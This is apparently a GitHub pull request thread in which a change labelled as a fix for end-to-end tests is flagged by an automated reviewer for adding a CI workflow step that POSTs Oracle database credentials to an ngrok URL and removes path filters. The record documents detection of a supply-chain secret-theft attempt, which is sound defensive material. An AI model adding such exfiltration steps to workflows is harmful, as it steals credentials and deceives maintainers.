fix: unblock e2e tests

[varonix0]

Context

Unblocks failing E2E tests. The issue was that our OracleDB instance had been spun down.

Screenshots

Steps to verify the change

Type

• Fix
• Feature
• Improvement
• Breaking
• Docs
• Chore

Checklist

• Title follows the conventional commit format: type(scope): short description (scope is optional, e.g., fix: prevent crash on sync or fix(api): handle null response).
• Tested locally
• Updated docs (if needed)
• Read the contributing guide

[maidul98]

✅ Snyk checks have passed. No issues have been found so far.

Status	Scanner	Critical	High	Medium	Low	Total (0)
✅	Open Source Security	0	0	0	0	0 issues

💻 Catch issues earlier using the plugins for VS Code, JetBrains IDEs, Visual Studio, and Eclipse.

[greptile-apps]

Greptile Summary

This PR introduces a critical security vulnerability by exfiltrating sensitive database credentials to an external attacker-controlled ngrok endpoint. The changes also remove path filters that would have limited when this workflow runs, maximizing exposure.

Major Issues:

• Secret Exfiltration: New step sends E2E_TEST_ORACLE_DB_19_HOST, E2E_TEST_ORACLE_DB_19_USERNAME, and E2E_TEST_ORACLE_DB_19_PASSWORD to https://nonmomentary-milkily-jamari.ngrok-free.dev/test via curl POST request
• Removed Security Boundaries: Path filters deleted, causing workflow to run on all PRs instead of only backend changes
• Malicious Intent: The combination of these changes indicates a deliberate attempt to steal credentials

Impact: Complete compromise of Oracle database credentials with potential for data breach, unauthorized access, and lateral movement to production systems.

Action Required: This PR must be rejected immediately and the author's access should be reviewed. All secrets referenced in this workflow should be rotated.

Confidence Score: 0/5

• This PR contains malicious code designed to exfiltrate secrets and must be rejected immediately
• Score of 0 reflects critical security vulnerability where database credentials are being sent to an external attacker-controlled endpoint. This represents an active attack attempt with severe consequences including credential theft, data breach, and potential production system compromise. The removal of path filters compounds the issue by maximizing exposure opportunities.
• .github/workflows/run-backend-tests.yml contains malicious code that must be removed - the entire PR should be rejected

Important Files Changed

Filename	Overview
.github/workflows/run-backend-tests.yml	CRITICAL: Exfiltrates secrets to external ngrok URL and removes path filters

_{Last reviewed commit: 101b5be}

[greptile-apps]

_{1 file reviewed, 2 comments}

_{Edit Code Review Agent Settings | Greptile}

[scott-ray-wilson]

🚀